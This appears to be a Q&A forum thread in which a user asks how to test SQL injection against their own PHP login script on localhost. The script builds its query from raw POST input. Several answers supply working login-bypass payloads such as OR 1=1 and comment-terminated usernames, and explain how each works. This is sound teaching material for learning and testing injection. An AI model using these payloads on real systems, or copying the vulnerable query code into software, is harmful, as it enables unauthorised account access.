Security PHP login SQL injection

Question

I want to try on my localhost SQL injection on this login script. But I dont know how. Database have three column id , nameUser , passwordUser . Or I need create some other script, which is unsecure for injection.
Thanks for your advice.

if(isset($_POST['sent'])) {
$nameUser =  $_POST["name_User"];
$passwordUser = $_POST["password_User"];
$heslo = hash('sha512', $passwordUser);


$dotaz = $spojeni->query("select * from uzivatele where nameUser = '$nameUser' and passwordUser = '$heslo'");
$result = mysqli_num_rows($dotaz);
$row = mysqli_fetch_array($dotaz);
if ($result == 1) {
    echo "You are log in";
    die();
} else {
    echo "badlogin";
    exit();
} }

Answer 1

To sign in as john (assuming it's a valid user) you can convert this:

select * from uzivatele where nameUser = '$nameUser' and passwordUser = '$heslo
                                          ^^^^^^^^^

... into this:

select * from uzivatele where nameUser = 'john' -- ' and passwordUser = '$heslo'
                                          ^^^^^^^^^

... by setting $_POST["name_User"] equal to the underlined code. The password condition is completely ignored because it's now inside a comment.

If you don't want to impersonate someone but just sign in with any random user, you only need to ensure that the final query returns exactly one row, eg:

select * from uzivatele where nameUser = '' OR 1=1 LIMIT 1 -- ' and passwordUser = '$heslo'
                                          ^^^^^^^^^^^^^^^^^^^^

Answer 2

' or '1'='1

If above is entered as username and password this will do what you are trying to achieve.

So query will get modified like:

SELECT * FROM uzivatele WHERE nameUser='' or '1'='1' AND passwordUser='' or '1'='1';

Its looking for each to be true, as 1 will always equal 1.

Answer 3

NOTE:

I try everything ' OR 1=1 ' OR id = 1--...but dont work.

In your question you are using both Procedural and Object Orientated PHP MySQL interactions, which will not work and will give you various script errors. You need to use one or the other, these two things do not interact with each other!

---

My Answer

Strings in MySQL are encased in single quotes so you need to close off the string early, and then add any MySQL command you want to on the end before finally tidying up so you do not cause a syntax error in the original SQL statement (although from an injection point of view syntax errors can be beneficial in seeing just how vulnerable SQL queries are, as people with these vulnerbilities often output their errors to screen rather than log files, etc.):

part 1:

Close the input string early; x'

Part 2:

carry on the SQL statement adding your own instructions but not causing a Syntax error (part 3).

Typically using numbers: OR 1=1 (will always be true)

Part 3 preventing a syntax error.

-- or # (start comment) or appending the SQL so that the full SQL query is syntactically correct (injection string finishes with an open string): nameUser = 'z

So your input username string can now be:

x' OR 1=1 OR nameUser='z

giving your SQL:

select * from uzivatele where nameUser = 'x' OR 1=1 OR nameUser='z' 
 and passwordUser = ''

Or alternatively using comments:

x' OR 1=1 -- 

select * from uzivatele where nameUser = 'x' OR 1=1 -- ' and passwordUser = ''